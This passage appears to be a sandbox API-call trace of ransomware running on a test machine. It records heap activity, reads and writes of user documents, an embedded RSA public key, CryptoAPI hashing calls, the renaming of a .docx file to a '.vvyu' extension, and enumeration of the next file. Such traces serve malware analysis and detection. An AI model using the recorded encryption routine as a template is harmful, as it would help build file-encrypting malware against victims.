0x2a0dac0 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c38 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0db08 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0189.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.320] GetCurrentThreadId () returned 0x5d8 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae43c8 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.321] GetCurrentThreadId () returned 0x5d8 [0189.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db68 [0189.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db08 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db98 [0189.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db38 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db98 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2c38 | out: hHeap=0x2c0000) returned 1 [0189.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.331] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xb8a6, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xb8a6, lpOverlapped=0x0) returned 1 [0189.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.332] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb8ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.333] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.334] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.335] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.335] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.335] CloseHandle (hObject=0x584) returned 1 [0189.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0189.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0189.337] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\qCa-wrdfbpIzYp.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qca-wrdfbpizyp.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\qCa-wrdfbpIzYp.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\qca-wrdfbpizyp.docx.vvyu")) returned 1 [0189.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.338] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0189.341] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62267ec0, ftCreationTime.dwHighDateTime=0x1d878ea, ftLastAccessTime.dwLowDateTime=0x42137560, ftLastAccessTime.dwHighDateTime=0x1d8929a, ftLastWriteTime.dwLowDateTime=0x42137560, ftLastWriteTime.dwHighDateTime=0x1d8929a, nFileSizeHigh=0x0, nFileSizeLow=0xcbd7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="riNXJCPkFg.pptx", cAlternateFileName="RINXJC~1.PPT")) returned 1 [0189.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2c38 [0189.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2c38 | out: hHeap=0x2c0000) returned 1 [0189.342] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\riNXJCPkFg.pptx") returned=".pptx" [0189.342] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\riNXJCPkFg.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\rinxjcpkfg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.343] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=52183) returned 1 [0189.343] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.347] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcbb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.347] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.349] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.349] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xcbd7, lpOverlapped=0x0) returned 1 [0189.351] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.351] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.351] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.351] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.352] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.352] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.352] CryptGetHashParam (in: 